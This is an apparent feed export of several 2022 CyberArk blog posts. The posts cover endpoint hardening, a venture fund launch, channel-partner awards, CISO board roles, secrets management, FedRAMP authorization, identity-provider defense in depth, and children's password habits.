1. Remove local admin rights. Microsoft Windows, macOS and Linux administrator accounts are used to install and update workstation software, configure system settings and manage user accounts. Attackers target these privileged accounts to disable antivirus software or disaster recovery tools and launch ransomware and other types of malicious software. Moving local admin rights away from standard users and into a secure digital vault with credential rotation is the fastest and simplest step toward hardening employee workstations. It dramatically limits an adversary’s reach, while minimizing the impact of unintentional (yet inevitable) employee errors, such as clicking on a phishing link.

2. Enforce least privilege. Employees often have a legitimate need to perform an action requiring administrative privileges. Just-in-time privileged access enable workers to perform certain specified tasks, based on policy, at the right time for the right reason — without requiring end-user action or help-desk intervention that can hinder productivity.

3. Institute application control policies. Blocking ransomware and other attacks at the endpoint requires more than just the ability to allowlist and denylist known applications. Organizations must be able to:

  • “Greylist” applications, such as sandboxing an unknown application and allowing it to run but not access the internet to reduce ransomware risks.
  • Implement advanced conditional policies, so workers can use trusted applications safely. For example, allow Excel to run but prohibit it from launching PowerShell to defend against BazarBackdoor malware.
  • Create comprehensive rules covering specific executables (i.e., by considering a hash, file name, file path) as well as groups of executables (i.e., default-allowing applications that are signed by a specific vendor, have a specific product name associated with them and originate from a designated trusted updater source).

4. Protect cached credentials. Credential theft is the No. 1 area of risk for organizations today. Many popular business applications allow credentials to be stored in memory, and many web browsers and password managers cache application and website credentials locally. Once logged in with these stolen credentials, attackers may try to circumvent single sign-on (SSO) solutions as well. Since threat actors can often retrieve cached credentials without ever needing admin privileges, having the ability to automatically detect and block credential harvesting attempts is a crucial endpoint security layer.

5. Set up traps. And speaking of detection, endpoint protection tools that support privilege deception functionality — such being able to create fake “honeypot” privileged accounts — can help flag would-be attackers right off the bat.

6. Monitor privileged activities. Attackers often fly under the radar, probing defenses and planning their next moves. By proactively monitoring privileged workstation activity, organizations can automatically identify and stop adversaries before they can move laterally, escalate privileges and inflict serious damage. Having complete records of privileged workstation activity is also key in streamlining compliance audits and speeding forensics investigations.

Inadequately protected employee workstations represents a common security gap — one I’ve seen too many times in my incident response work. If I could offer one piece of advice for organizations looking to shore up security against ransomware and other damaging attacks, it’s this: don’t wait — behave as if you’ve just been breached. By following key Identity Security-centric steps to mitigate risk, as well as separating workstations from servers and embracing a layered defense-in-depth strategy, your organization will be better equipped to isolate attacker activity, minimize impact, regain control of your environment and restore trust quickly and efficiently.

]]>
CyberArk Ventures: Bringing Security-First Innovators Together to Amplify Impact https://www.cyberark.com/blog/cyberark-ventures-bringing-security-first-innovators-together-to-amplify-impact/ Thu, 12 May 2022 10:45:04 +0000 https://www.cyberark.com/?p=130755 Introducing CyberArk Ventures

Security is our north star at CyberArk. It guides every step we take as a company, from pioneering the Privileged Access Management space to delivering on our Identity Security vision today. Our continued focus on security-first innovation is why more than 7,000 organizations around the globe entrust CyberArk to secure their most critical assets.

During the past several years, the digital world has become a much larger, more interconnected and increasingly vulnerable place. Advancements in cloud, DevOps, machine learning and automation are driving transformation and economic progress. They have also created new threats and expanded the attack surface, creating more opportunities for cyber attackers seeking to take down organizations, cripple supply chains and critical infrastructure and unleash chaos. As a result, cyber threats are among the greatest challenges facing organizations today.

It is important to emphasize that the security problems the public and private sectors are all grappling with are vast and complex. No one company can do it all. Now, more than ever, security is a team game.

That’s why we’re proud to launch CyberArk Ventures today. We’ve initially aligned with four venture capital investors including Venrock, YL Ventures, Team8 Capital and Merlin Ventures, bringing the next generation of cybersecurity innovators to the race against identity-related threats and strengthening cyber resilience from every angle.

In setting our strategy and embarking on this journey, we’ve been inspired by talented entrepreneurial teams around the world that demonstrate the ingenuity, technical acumen and commitment needed to reduce systemic cybersecurity risk. Our goal with CyberArk Ventures is to foster and accelerate this innovation by providing financial backing and access to go-to-market support.

CyberArk has devoted $30 million to the CyberArk Ventures fund, which is actively deploying capital. Initial fund recipients represent a powerful trifecta of network security, application security and data security that complements our Identity Security vision and security-first approach to securing all identities — human and machine — wherever they exist. Our “team” needs players of all kinds across multiple cybersecurity dimensions. If you’re part of an early-stage company that’s serious about security, is taking a novel approach to solving a big business challenge and is pushing past boundaries to unlock greater value and results for customers, we want to hear from you.

We are excited about the future of CyberArk Ventures and believe it can serve as a force multiplier for good. With an experienced leadership team here at CyberArk, a world-class collection of initial investors and the next-generation of cybersecurity disrupters all united by a shared mission and purpose — just imagine the possibilities!

For more information on CyberArk Ventures, check out the infographic below.

CyberArk Ventures Infographic

 

 

 

 

 

]]>
4 Extraordinary Women in Identity Security Named to CRN’s 2022 Women of the Channel List https://www.cyberark.com/blog/4-extraordinary-women-in-identity-security-named-to-crns-2022-women-of-the-channel-list/ Tue, 10 May 2022 13:19:14 +0000 https://www.cyberark.com/?p=130924 4 Women in Identity Security Named to CRN’s 2022 Women of the Channel List

Each year, CRN’s Women of the Channel list honors the accomplishments of female leaders in the IT channel. Today, we celebrate four of CyberArk’s own incredible Women in Identity Security named to CRN’s newly published 2022 list for their vision, leadership and dedication to channel excellence.

Over the past year, these fearless females have played integral roles in extending CyberArk’s market leadership position and empowering CyberArk partner organizations to accelerate growth as they help customers protect against advanced cyber threats and realize the full value of Identity Security:

Cindy Baptiste, Senior Director, Global Partnerships and Channel Sales, CyberArk

As part of her role in defining and executing CyberArk’s global go-to-market channel strategy, Baptiste worked cross-functionally to introduce six products to the channel. By delivering a tremendous increase in partner enablement and certifications, her team has helped grow the overall channel business by more than 35% year over year.

Stephanie Novak, Director, Global Partner Programs, CyberArk

With deep expertise in change management and transformation — along with a roll-up-her-sleeves attitude — Novak has brought both competency and capacity to the CyberArk team. By analyzing current program offerings and processes, she’s been instrumental in defining key initiatives for the CyberArk Partner Program roadmap — including new enhancements that will roll out this year.

Tonya Vincent, Director, Global Channel Marketing, CyberArk

Keeping partners informed of plans, product innovations and enablement resources is critical to growing an effective channel program. From organizing CyberArk’s first global channel partner conference to optimizing its global MDF program, Vincent spearheaded efforts to amplify communication, information sharing and engagement across the CyberArk Partner Network.

Kelly Wong, Channel Process and Technology Manager, CyberArk

Wong’s work in designing and implementing channel operational strategies, processes and policies for partners has been integral in optimizing the health of the channel program and back-office functions to enable a best-in-class partner experience.

CRN asked how these Women in Identity Security are bringing comprehensive channel initiatives to life, and what advice they have for women entering the cybersecurity market. Here’s just a glimpse at their responses:

As the IT landscape changes rapidly, customers and their buying patterns are also changing. How is CyberArk enabling partner organizations during this shift, so they can maximize opportunities to help their customers secure access across any device, anywhere, at just the right time? 

Says Baptiste, “With CyberArk’s shift to subscription and SaaS-based delivery, we’re providing partners with more opportunities to open their business beyond the transactional space and deepen customer value. To do this, we’re helping selling partners become great delivery and managed services providers, as well as co-creators of IP with the CyberArk Identity Security Platform as the underpinning of the Identity Security frameworks they’re building for their customers. This puts the focus on delivering successful business outcomes for customers.”

What is your advice to partner organizations for maximizing their success in 2022?

Says Novak, “Engage with your Channel Account Manager (CAM) regarding your go-to-market and customer engagement models — whether it’s resell, consulting, managed services or a combo to find the right programmatic elements that align with your business models. Focus solutions on delivering business outcomes that create value and drive customer success. To do so, you will need a well-enabled team of sales and technical professionals who can deliver a polished customer experience.”

How does hiring play a part in delivering amazing partner experiences?

Baptiste says, “My team’s charter is to be the ‘easy button’ for partners and for the CyberArk Global Channel Organization. We accomplish this by hiring the best people, giving them the freedom to do what they are experts at doing, collaborating on best practices based on collective experience and market trends, and providing a fun and exciting environment which keeps them motivated and driven to continue to build a best-in-class partner experience.” She credits her incredible team in the successful rollout of new continuing education modules, which resulted in an impressive 190% year-over-year increase in partner certifications.

What’s one thing you love about your job and why?

“The people and culture at CyberArk,” says Vincent. “My marketing teammates are the best — not only are they super supportive, but they also have a channel-first mindset. Additionally, the global channel sales organization is top-notch. Filled with experienced leaders and channel account managers, they make my job fun.”

What are your secrets for staying focused and finding motivation when you really need it?

“Surround yourself with positive and smart people: teams, friends and family. These people will continue to challenge your mind and give you new perspectives,” encourages Wong.

This fearsome foursome closes with advice for women entering the cybersecurity market.

“Don’t be afraid to ask for help,” notes Baptiste. “Find people you respect and build relationships with them. And go outside of your comfort zone. That’s where the magic can happen, and you learn and grow in the most unexpected ways.”

“Find your tribe. Reach far and wide in many areas of the business and build strong, lasting and meaningful relationships. It will help you in your current role and also give you access to subject matter experts that you can call when you have questions about how to handle challenges,” says Novak.

Look beyond your organization as well, encourages Vincent. “Establish mentors and peers outside of work through LinkedIn and groups like Women of the Channel. This outside network offers great advice, recommendations and support at anytime,” she says.

“Always tackle a challenge/problem/issue/task with a positive frame of mind. At the end of it all, you’re doing it to make things better for yourself and everyone else,” says Wong.

Editor’s Note: Answers have been edited for length and clarity. CRN’s 2022 Women of the Channel list will be featured in the June issue of CRN Magazine and online at www.CRN.com/WOTC.

 

]]>
CISOs Are Having a Moment. Here’s How to Make It Last https://www.cyberark.com/blog/cisos-are-having-a-moment-heres-how-to-make-it-last/ Fri, 06 May 2022 16:49:00 +0000 https://www.cyberark.com/?p=130764 CISOs Are Having a Moment. Here's How to Make It Last

The landmark Sarbanes-Oxley Act of 2002 (SOX) was passed during a highly tumultuous era, overhauling corporate governance and bringing financial expertise to the boardroom. Fast-forward to present day, and uncertainty is again the prevailing economic theme; more than 70% of organizations have experienced ransomware attacks in the past year, and 64% admit they cannot stop a supply chain-related attack. As they did 20 years ago, regulators are calling for sweeping change: this time for increased cyber disclosures by public companies, and specifically, greater cybersecurity aptitude at the corporate director level. Once again, boards are poised for a shakeup, one that legal experts say will bring more CISOs to the table.

As their strategic role expands, many CISOs around the world are “having a moment,” bolstered by growing top-level support and additional resources to advance their cybersecurity missions. But making the most of this moment — and making it last — will come down to focus across four key areas.

1. Focus on data

While four out of five organizations increased their cybersecurity budgets in 2022, no security leader has enough resources to tackle everything on their to-do list at once. Risk quantification is a continued challenge: a Harvard Business Review Analytic Services survey sponsored by PwC found that less than half (45%) of executives “strongly agreed” that they had a formalized process to evaluate cyber risks in line with business priorities. The survey shows a small but growing number of CISOs are turning to frameworks such as the open-source FAIR (Factor Analysis of Information Risk) methodology, analyzing causal relationships in high-risk scenarios or deploying actuarial models to get a more accurate financial estimate of the threats their companies face. Since these risk models are only as strong as the data that feed them, security tools that can enhance intelligence gathering, broaden visibility and deepen contextual insights are critical for communicating risk in business terms and optimizing cybersecurity spending.

2. Focus on impact

While threats and business priorities change, identity’s integral role in the cyber attack chain does not. The latest Identity Defined Security Alliance (IDSA) research indicates 79% of organizations have experienced an identity-related breach within the last two years, and 93% believe they could have prevented or minimized security breaches if they had implemented specific identity-related security outcomes. Any identity — human or machine — located anywhere across business applications, distributed workforces, hybrid cloud workloads or throughout the DevOps lifecycle can be compromised and open an attack path to an organization’s most valuable assets. With this understanding comes focus: more than half of CISOs and CIOs have introduced (or plan to introduce) Identity Security measures to better manage sensitive access, including real-time monitoring and analysis to audit all privileged session activity, enforcing least privilege security and Zero Trust principles on infrastructure that runs business-critical applications and implementing processes to isolate business-critical applications from internet-connected devices to restrict lateral movement.

3. Focus on business enablement

CISOs can play a powerful strategic role in driving high-stakes digital initiatives forward. What’s key is inserting themselves into these projects from the beginning — to educate IT and line-of-business owners on security and privacy risks and establish consistent, Zero Trust-centric processes such as securing user access to the very applications that fuel transformation initiatives. Doing so can also help CISOs stay in alignment with key stakeholders and better balance investments between digital initiatives and critical security protections to avoid cybersecurity debt accumulation that can hamstring progress.

4. Focus on user experience

When end users can’t navigate the security process or must contend with too many different security tools, they often find workarounds, make poor password choices or take other actions that can lead to identity-based vulnerabilities attackers can exploit. Eighty-six percent of senior security leaders say user experience (UX) optimization is “important” or “very important,” and many are wisely focused on incorporating controls that work to secure access — regardless of device or location and at just the right time — while keeping users productive and informed.  AI, machine learning and automation can help make Identity Security processes more effective and more user friendly over time by mapping behavior patterns and contextual signals and continuously optimizing controls based on these learnings and dynamic risks.

The Power of Focus

In a 2021 global survey of CISOs, recruiting firm Heidrick & Struggles found that nearly half of CISOs want to be board members — something that seems increasingly achievable and essential to building organizational cyber resilience. By maintaining a focused approach across these four areas, CISOs can demonstrate their strategic capabilities, strengthen the boardroom and confidently defend against attacks as they take their hard-earned and long-overdue seat at the table.

]]>
You’ve Got Privileged Access Management… But Can You Keep Secrets Secure? https://www.cyberark.com/blog/youve-got-privileged-access-management-but-can-you-keep-secrets-secure/ Tue, 03 May 2022 13:00:33 +0000 https://www.cyberark.com/?p=130725 You’ve Got Privileged Access Management… But Can You Keep Secrets Secure?

Threat actors don’t often need to execute the latest zero-day exploit or fight through firewalls to launch their attacks. Instead, they simply walk through the front door with stolen user credentials and take over legitimate digital identities. But while cyber attacks can be inevitable, damage and disruption are not. Organizations that take a privilege-centric approach to securing identities — both human and machine — are better positioned to stop attackers from reaching valuable assets and data.

In the Beginning, There Were Human Identities. Then, Non-Human Identities Emerged in Full Force

As organizations accelerate major digital initiatives and employ automation across their enterprise, continuous integration and continuous delivery (CI/CD) and DevOps methodologies have become the key to moving fast and staying agile. And applications — from traditional software solutions hosted in corporate data centers to modern applications running in the cloud — are the backbone of modern business. Identity Security programs must evolve and extend across these areas, weaving Privileged Access Management into the fabric of enterprise strategy and application pipelines.

Applications, DevOps tools and development and delivery pipelines are full of identities. It’s just that “identities” take on a different, non-human form in these dynamic environments: they’re applications, scripts, automation tools and myriad other machines. Each one requires secrets — SSH keys, API keys and other credentials — to access IT systems and other sensitive resources to do what they’re supposed to do. These secrets and credentials are highly attractive targets and the primary means for attackers to gain a foothold into an organization.

Application Secrets and Credentials are Everywhere

As non-human identities outnumber human identities by 45x on average, protecting this significant piece of the digital identity equation is imperative. Yet the CyberArk 2022 Identity Security Threat Landscape Report found that in many organizations, secrets management practices have not kept pace with the speed of digital innovation:

  • Secrets are stored in multiple places, according to 87% of respondents
  • Half said application credential security was left up to developers — a functional group known for emphasizing speed over security
  • 80% agreed developers have more privileges than they need

The SolarWinds digital supply chain attack, CodeCov and other major incidents have made enterprise executives increasingly aware of the critical need to secure secrets in applications and development environments. Yet the CyberArk report revealed 62% of organizations have done nothing to secure their software supply chains post-SolarWinds even though 71% said their organization has suffered damages from a supply chain-related attack since the landmark breach.

Extending a Solid Privilege-based Security Foundation to Manage Secrets

According to Gartner®, security and risk management leaders responsible for IAM should “Expand the scope and benefit of your PAM programs by making full use of the full feature set of your PAM tools, especially secrets management for DevOps use cases, and CIEM for IaaS visibility.”1

With a solid Privileged Access Management foundation in place, security teams must now focus on expanding their Identity Security programs to encompass all facets of privileged access. That means securing human and non-human identities throughout the cycle of accessing critical assets — without slowing down development teams or delaying automation deployments.

It can be challenging to know where to start. Most organizations will need to secure an array of applications developed and maintained by different teams using different tools and hosted in different locations using various deployment models (on-prem, private cloud, public cloud or hybrid environments). Some applications are more critical to the business than others. Some are more mature and more difficult to adapt than others. And each application poses a special set of risks. Few security teams have the time or resources to take on all these challenges at once.

That’s where an agnostic, risk-aligned framework can help prioritize efforts by introducing Identity Security controls in stages, depending on your organization’s specific requirements. Take advantage of the following resources as you create a plan to give applications easy access to the secrets they need, while keeping credentials out of reach from attackers.

1 – Gartner, Critical Capabilities for Privileged Access Management, Felix Gaehtgens, Abhyuday Data, Michael Kelley, Swati Rakheja, 19 July 2021

Gartner Disclaimers

GARTNER® is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

 

]]>
CyberArk SaaS Solutions Now In-Process for FedRAMP High Authorization https://www.cyberark.com/blog/cyberark-saas-solutions-now-in-process-for-fedramp-high-authorization/ Wed, 27 Apr 2022 15:30:51 +0000 https://www.cyberark.com/?p=130534 CyberArk SaaS Solutions Now In-Process for FedRAMP High Authorization

The Biden Administration’s Executive Order (EO) on “Improving the Nation’s Cybersecurity (14028)” and memorandum on “Moving the U.S. Government Toward Zero Trust Cybersecurity Principles (OMB M-22-09)” have underscored Identity Security’s key role in protecting sensitive government data and infrastructure from supply chain-related attacks and other emerging threats.

Reinforcing CyberArk’s commitment to providing trusted, independently verified Identity Security solutions to the U.S. Government, we are announcing today that two of our leading SaaS offerings, CyberArk Endpoint Privilege Manager and CyberArk Identity, are now “In-Process” for Federal Risk and Authorization Management Program (FedRAMP) High authorization.

FedRAMP is a government-wide program that promotes the adoption of secure SaaS services across the U.S. Federal Government by providing a standardized approach to security assessment, authorization and continuous monitoring for cloud products and services. FedRAMP empowers government agencies to use modern cloud technologies, with an emphasis on security and protection of federal information. FedRAMP also serves as an important validation for U.S. state and local governments. Many organizations in the private sector look to the FedRAMP Marketplace for SaaS solutions that have met the government’s most stringent requirements for confidentiality, integrity, and availability.

As the highest level of authorization, FedRAMP High was introduced to account for some of the government’s most sensitive, unclassified data in cloud computing environments. Some of this data involves protecting the lives, reputations, and financial well-being of U.S. residents.

Today’s announcement is a significant milestone in CyberArk’s FedRAMP journey toward the High-level “Authorized to Operate” distinction held by only 42 organizations today. With this authorization, CyberArk will be uniquely positioned to help federal agencies secure access to critical data and infrastructure, protect distributed workforces and accelerate cloud innovation.

CyberArk FedRAMP High Details

Question, Confirm and Trust — Be Supplier Smart

Highly interconnected information and communications technology (ICT) supply chains deliver critical products and services to both public and private sectors. Yet continued cyber attacks show that an organization’s supply chain is only as strong as its weakest link. This National Supply Chain Integrity Month, the U.S. Cybersecurity and Infrastructure Agency (CISA), Office of the Director of National Intelligence (ODNI) and other government and industry partners are calling for organizations to “Be Supplier Smart” as part of a unified effort to #FortifytheChain.

Cyber attackers know that the best way to gain access to a particular target — whether it’s a global enterprise, a government agency or critical infrastructure — is often through a third-party vendor or supplier. Taking steps to ensure the trustworthiness of your organization’s vendors and suppliers is a key aspect of managing supply chain risk.

CISA, ODNI and the newly established ICT Supply Chain Risk Management (SCRM) Task Force emphasize the need for organizations to conduct robust due diligence when selecting third-party providers, understand their cybersecurity practices, and establish and enforce standards throughout the lifecycle of a product or service. They’ve created a set of tools to help organizations ease third-party supplier evaluation processes, including recommendations on using qualified bidder lists to enhance supply chain security.

Authors note that “Establishing and utilizing vetted, qualified sources of supplies can limit an organization’s exposure to risk,” providing examples of widely recognized standards that organizations across all sectors can consider when building their own qualified lists, including FedRAMP for secure cloud services. 

A Proven, Trusted Partner for Critical Cybersecurity Initiatives

Attackers continue to innovate, looking for new ways to exploit vulnerabilities and compromise identities deep in the supply chain to launch their attacks, then work to gain access to sensitive assets further down the chain.

As your organization works to strengthen the security of its supplier ecosystem with qualified third-party entities, see why government agencies and enterprises worldwide trust CyberArk’s proven SaaS-based Identity Security solutions to secure all identities from end to end to protect their most valuable assets.

]]>
Secrets Management to Protect the Software Supply Chain: A Q&A with IDC’s Jim Mercer https://www.cyberark.com/blog/secrets-management-to-protect-the-software-supply-chain-a-qa-with-idcs-jim-mercer/ Tue, 26 Apr 2022 11:14:27 +0000 https://www.cyberark.com/?p=130525 Secrets Management to Protect the Software Supply Chain: A Q&A with IDC’s Jim Mercer

Governments and intelligence agencies continue to emphasize technology providers’ critical role in strengthening cybersecurity and supply chain resilience for the long run. In fact, the Biden Administration’s recent call to “bake security in, don’t bolt in on” could serve as the DevSecOps mission statement.

Managing the secrets used by applications, scripts and other non-human identities across DevOps environments and CI/CD pipelines is widely considered fundamental to “shifting security left” — especially as non-human identities outnumber human ones by a factor of 45 in the average enterprise.

So how are organizations tackling secrets management as they move toward DevSecOps maturity? What do they see as major benefits, challenges and priorities? To take a pulse, IDC recently conducted a global survey of more than 400 cybersecurity, DevOps and IT practitioners at organizations with at least 1,000 employees. To explore the results of the research summarized in the IDC InfoBrief, “Managing Application Secrets Across the Enterprise,” we spoke with author and IDC Research Director for DevOps and DevSecOps Jim Mercer. The following are his perspectives on key findings.

Let’s start with a definition: what exactly is “secrets management” in your view?

IDC defines secrets management as the processes used to manage digital authentication and identification (i.e., secrets) within applications, including passwords, encryption keys, application programming interfaces (APIs), certificates and tokens.

Secrets are essentially “digital keys” that unlock doors to valuable corporate data, so protecting them within applications, on developer workstations, on admin consoles and everywhere else across the development environment is key.

It was encouraging to see secrets management ranked as the No. 1 priority for organizations over the next year to improve the security of application development environments. But the fact that 71% said their current approach for securing the software supply chain leaves them susceptible to cyber attacks suggests there is still work to be done.

The White House recently urged technology organizations to only develop applications on systems that are “highly secure and accessible only to those actually working on a particular project,” noting that “this will make it much harder for an intruder to jump from system to system and compromise a product or steal your intellectual property.” How can secrets management help with this?

In the context of application development, secrets management provides assurance that resources across stacks, platforms and the cloud can only be accessed by authenticated and authorized identities.

By removing secrets from code and other unprotected areas, secrets management solutions can help protect secrets and other credentials from being stolen or compromised. And by enforcing the principle of least privilege and rotating and monitoring credentials, secrets management makes it harder for threat actors to move through an environment and gain the privileged access needed to progress their attacks.

It should be obvious to say that “all secrets must be protected,” but why does this still prove to be a challenge for many organizations?

Because secrets are everywhere. And as an organization’s applications and infrastructure continue to constantly evolve, new secrets are created and are stored in various places — often with little tracking and varying levels of security. This “secrets sprawl” only gets worse over time, especially as cloud-native app development increases. Managing secrets with disparate tools creates even greater complexity from both a security and compliance standpoint, as secrets get stored in duplicate locations or are missed altogether.

Our survey found a direct correlation between organizations’ DevSecOps maturity level and their secrets management approach: 91% of DevSecOps early adopters use secrets managed by individual teams, which tends to create more sprawl and makes it difficult to establish and share security best practices. Meanwhile, 94% of DevSecOps leaders embrace a centralized approach to secrets management.

What is the biggest hurdle organizations face in integrating security, including secrets management, into application development?

Our survey revealed a continued lack of collaboration between DevOps and security teams, and 66% of organizations admitted to experiencing avoidable mistakes as a result. 

To bridge this gap, effort is needed on both sides. DevOps teams need to proactively include security teams, rather than waiting to get them involved just before code goes live. Forty-two percent admitted security stakeholders are rarely included in planning discussions about secrets management. Likewise, security teams need to contribute by getting up to speed on secrets management — a subject 50% of cloud infrastructure VPs said is not well understood by security.

Small steps can lead to big changes over time. Consider creating agile “birds of a feather” and “coffee chat” groups focused on application security and secrets management to bring teams together.

How can security teams make it easy for developers to “do the right thing” when it comes to secrets management?

When developers are empowered with the right security tools, they will take ownership of security. Based on our survey findings, developers want secrets management tools that are easy to use, can integrate seamlessly into the DevOps pipeline and offer self-service capabilities.

What key areas of secrets management do organizations want to improve?

Respondents ranked support for modern hybrid and multi-cloud environments and integration with Identity and Access Management (IAM) and Privileged Access Management (PAM) solutions as their top two areas of improvement over the next two years.

They’re also looking to up-level their existing secrets management approaches with enterprise-class capabilities, with particular emphasis on support for hybrid and multi-cloud environments.

Get more secrets management insights to protect the software supply chain

Software supply chain attacks can be multi-layered — involving several interim steps or vectors. But the ultimate goal is the almost always the same: compromise identities by stealing secrets and credentials and escalating privileges to reach valuable corporate assets.

A fundamental component of a defense-in-depth approach is securing identities throughout the application development environment — including cloud-native applications — with secrets management. When approached holistically and collaboratively, secrets management can help improve operational efficiency (38%), reduce the risk of secrets leaks (41%) and accelerate the adoption of DevSecOps (39%), said survey respondents.

Get more secrets management insights from enterprise teams by reading the IDC InfoBrief, sponsored by CyberArk, “Managing Application Secrets Across the Enterprise,” IDC Doc. #US48924522, March 2022.

]]>
4 Ways to Strengthen Your Identity Provider with Defense in Depth https://www.cyberark.com/blog/4-ways-to-strengthen-your-identity-provider-with-defense-in-depth/ Wed, 20 Apr 2022 13:00:29 +0000 https://www.cyberark.com/?p=130377 4 Ways to Strengthen Your Identity Provider with Defense in Depth

Some of the world’s most technologically advanced enterprises have grappled with identity-related breaches in recent months. These incidents have further highlighted how digital identities have come to simultaneously represent today’s greatest cybersecurity challenge and the core of modern enterprise security.

It’s become clear that a holistic, all-hands-on-deck approach is required to stay ahead of attackers and make it more difficult for them to succeed.

We recently explored key steps for mitigating risk if your Identity Provider (IdP) is compromised. Today’s post will take this a step further, illustrating four specific ways in which a security-first, defense in depth strategy can help organizations better protect their data, users and customers by layering Identity Security controls over baseline IdP deployments — no matter which platform or various integrated technologies are in play.

Use Case #1. Protecting endpoints and enforcing the principle of least privilege

Defense in Depth for Endpoints

A defense-in-depth approach promotes strong multi-factor authentication (MFA) at the endpoint — beginning with the login process, which should require two separate authentication methods for entry, such as a password and a one-time-password (OTP).

Ideally, user accounts should not have local admin rights, making tasks such as changing system configurations, installing software or changing account settings off limits. When a user requires elevated privileges to execute an administrative action or launch a sensitive application, they should be prompted by MFA to validate their identity again before being granted just-in-time access to the resources they need, for just the right amount of time.

Enforcing context-aware, risk-based MFA and least privilege on the endpoint helps to prevent attackers from gaining a foothold within an organization, launching ransomware and other user-based attacks and jump-starting a cascade of reconnaissance activities and lateral movement.

Use Case #2. Monitoring and auditing high-risk web application sessions

Defense in Depth for Web Sessions

Nearly 80% of organizations report employee misuse or abuse of access to business applications. As more high-value data migrates to the cloud, a defense-in-depth approach is critical for managing web-application risk.

This starts by extending existing Single Sign-On capabilities to validate users at the beginning and during each session and enforcing global time-outs to minimize risk, such as when a user steps away from a device during a session. Implementing step-by-step session recording and monitoring within protected applications allows organizations to easily search for and audit actions — without impacting the user experience. To further protect sensitive data residing in applications, organizations can also choose to restrict data exfiltration actions, such as copying data and downloading files, and further limit individual user or application permissions based on specific needs and requirements.

Use Case #3. Storing and sharing credentials for password-based business apps and other sensitive data

Defense in Depth for Credentials

According to The CyberArk 2022 Identity Security Threat Landscape Report, credential access is the No. 1 area of risk for organizations today. Credentials are universally sought after as a means to compromise identities and launch attacks. Despite the widely known risks, business users are often left to manage credentials on their own — a major hassle that results in weak or reused passwords, credentials stored in plain text files, Excel spreadsheets or browsers, or the use of disparate password managers that limit security’s visibility and control.

A defense-in-depth approach can help eliminate password pains for business apps and other sensitive data, while boosting the overall user experience. By deploying a centralized vault-based storage system and making it accessible via passwordless authentication, an employee can simply login using an MFA QR code, for example, and then seamlessly add passwords, license numbers, encryption keys and other valuable data to the vault, securely accessing and sharing them with other users with a click of a button.

Use Case #4. Providing secure third-party privileged access to critical internal resources

Defense in Depth Third Party Access

More than 96% of organizations allow third-party access to critical systems today. To perform their intended tasks, these authorized third parties require rapid and secure provisioning/de-provisioning of privileged access to specific corporate IT systems. The challenge for organizations is to do so efficiently, securely and in compliance with a growing body of regulations.

Third-party policies must mirror established Zero Trust policies for internal employees, such as authenticating each time they require access. An effective defense-in-depth approach will allow vendors to bring their own decentralized identity to gain access to privileged resources via a universal portal — enabling simple yet secure authentication and providing vendor managers the ability to manage their own users’ access.

To improve security posture and reduce complexity, dynamic, just-in-time provisioning to privileged accounts can be granted on the fly for specific reasons and for specific amounts of time. Doing so without the need for passwords, tokens and network-based access controls further reduces the attack surface. And by enabling full session isolation, real-time monitoring and audit, organizations can increase their visibility into vendor activity — critical for reducing supply chain risks.

Close IdP Gaps with a Security-First, Defense-in-Depth Approach

No matter your organization’s industry or size, security matters. Take the time to evaluate your digital identity landscape for potential gaps and learn how a defense in depth approach can help address security vulnerabilities and provide additional assurances. Then, with a clear understanding of where you are today, prioritize Identity Security controls to help your organization get to where you want to be.

Explore lessons we can all learn from incidents targeting a critical security layer. And for more details on deploying CyberArk solutions alongside your current IdP to cover your Identity Security bases, tune in to the on-demand webinar “How to Leverage Defense in Depth to Minimize Risk.”

 

]]>
Kids Talk Cybersecurity, Online Habits and Growing Up in the Digital World https://www.cyberark.com/blog/kids-talk-cybersecurity-online-habits-and-growing-up-in-the-digital-world/ Thu, 14 Apr 2022 13:00:42 +0000 https://www.cyberark.com/?p=130011 Kids Talk Cybersecurity, Online Habits and Growing Up in the Digital World

Those of us who “came of age with the internet” had the luxury of testing the digital waters slowly — waiting for the dial-up modem to screech to life once or twice a week and slowly tapping out one-line T9 text messages. Technology played a relatively minor role in those quaint, formative years. But fast-forward a few (cough) decades, and most kids have mastered the touchscreen before their second birthday. But have they mastered cybersecurity basics as readily?

The internet touches virtually every aspect of modern life, simultaneously reflecting the best and worst parts of humanity. Helping kids navigate the digital world safely is a thorny challenge for many parents and caregivers today. In fact, a recent Google survey found that two in five parents don’t feel confident talking about tech-related topics with their kids, such as screen time, digital wellbeing and discovering quality apps, games and activities.

In the spirit of encouraging more frequent, candid conversations about responsible technology use, we went straight to the source. Some of what we heard from these digital natives buoyed our cybersecure-spirits, while other statements were somewhat alarming (albeit age appropriate).

Here’s what we learned about cybersecurity awareness and online habits in speaking with kids aged two to 16 (note: some names have been changed to protect privacy):

Turns out that passwords can be a pain for everyone — regardless of age. Some of the kids we spoke to admitted to risky password practices that, if not addressed, could potentially become bigger problems down the line.

What are passwords used for?

“You use them to call your friends’ parents to ask for a playdate.”  – Jack, 5

“Passwords stop people from sneaking on your phone.” – Finn, 8

What makes a strong password?

“Capital and lowercase letters, numbers and special characters. You shouldn’t use obvious personal info such as your name.” – Ben, 13

How do you remember your passwords?

“I’m just always going to use my mom’s password for everything, so I don’t forget it (proceeds to share it with everyone in the room).” – Lucas, 10

“My e-mail password has never been changed since I first made my account.” – Tim, 13

“I usually remember all my passwords because they are pretty similar to each other. I have two passwords that I use and have slight variations to each of them.” – Maya, 16

Some kids have taken common-sense precautions, such as enabling multi-factor biometric authentication, recognizing that passwords are not enough to protect key accounts like email, banking and social media.

“My phone is locked, and I can use a six-digit passcode or my Face ID to unlock it.” – Ben, 13

“I have a locked note in the notes app where I write all of my passwords.” – Jordan, 15

We asked kids about their family technology rules, potential cyber risks and making smart choices online. 

When are you allowed to use your tablet?

“On the couch.” – Paige, 2

“When my mom says it’s okay.” – Jack, 5

How do you make sure a website is safe before using it?

“I usually use my own intuition to determine whether a website is safe. If the website is .edu or .gov I usually can assume it is a reputable source. If I am online shopping on a site I’ve never used before, I will usually look at their privacy policy or look the website up to see if it is safe to give my personal information and credit card to them.” – Jordan, 15

“I usually look at the ending of the website title. For example, if the website ends in .org or .com, I usually assume that the website will be safe. In addition, I usually stick to the websites that appear at the top when I search for something, because those are the most commonly visited by other people.” – Maya, 16

Are you concerned that your online accounts could be compromised?

“I know it is definitely a possibility because I know lots of kids my age who’ve been hacked. But I know if I stay careful on the internet and learn from other people’s mistakes, I can likely stay safe on the internet.” – Tim, 13

